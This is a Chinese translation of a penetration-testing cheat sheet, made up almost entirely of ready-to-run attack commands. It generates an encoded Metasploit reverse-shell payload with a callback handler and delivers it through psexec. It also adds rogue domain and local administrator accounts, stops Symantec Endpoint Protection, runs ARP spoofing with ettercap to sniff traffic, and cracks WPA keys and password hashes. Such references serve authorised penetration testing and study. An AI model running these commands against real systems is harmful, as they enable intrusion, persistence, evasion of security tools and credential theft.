渗透测试实用Cheat Sheet

[译]Thanks   [原文]AverageSecurityGuy

这里整理了许多渗透测试中实用的TIPS，希望对您有用。PS.仅用于安全渗透测试及学习，禁止非法使用。

共享相关

# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

系统帐号操作相关

# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

STDAPI_SYS_PROCESS_EXECUTE: OPERATION FAILED: 1314

# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

METASPLOIT: 反弹及执行PSEXEC

# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

停用杀毒软件

# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

使用ETTERCAP嗅探流量

ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

WPA/WPA2 PSK破解

# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

使用NMAP建立IPLIST

nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

使用JOHN和KORELOGIC RULES进行密码破解

for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done